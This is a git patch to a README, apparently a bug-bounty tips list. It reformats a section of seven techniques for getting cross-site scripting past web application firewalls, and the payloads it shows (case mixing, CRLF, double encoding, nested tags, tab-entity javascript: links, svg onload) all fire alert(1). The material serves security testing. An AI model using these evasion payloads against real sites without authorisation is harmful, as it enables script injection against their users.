From b6d25c758a7f5c72824ca6f3356b7d6c356bc8cd Mon Sep 17 00:00:00 2001
From: Xalgord <48483027+xalgord@users.noreply.github.com>
Date: Sat, 20 Feb 2021 16:26:49 +0530
Subject: [PATCH] Update README.md

---
 README.md | 14 +++++++++++++-
 1 file changed, 13 insertions(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 81dadd5..c81713e 100644
--- a/README.md
+++ b/README.md
@@ -266,22 +266,34 @@ Here’s list of tools [@_justYnot](https://twitter.com/_justYnot) used:
 ## XSS firewall bypass techniques
 Here’s a list of 7 useful techniques on how we can bypass WAF (Web Application Firewall) while exploiting XSS (Cross-Site Scripting) in a web application:
 1. Check if the firewall is blocking only lowercase:
-<sCRipT>alert(document.domain)</sCRiPt>
+```
+<sCRipT>alert(1)</sCRiPt>
+```
 
 2. Try to break firewall regex with new line (\r\n), aka. CRLF injection:
+```
 <script>%0d%0aalert(1)</script>
+```
 
 3. Try double encoding:
+```
 %2522
+```
 
 4. Testing for recursive filters, if firewall removes the text in bold, we will have clear payload:
+```
 <scr<script>ipt>alert(1);</scr</script>ipt>
+```
 
 5. Injecting anchor tag without whitespaces:
+```
 <a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;">
+```
 
 6. Try to bypass whitespaces using a bullet:
+```
 <svg•onload=alert(1)>
+```
 
 7. Try to change request method (POST instead of GET):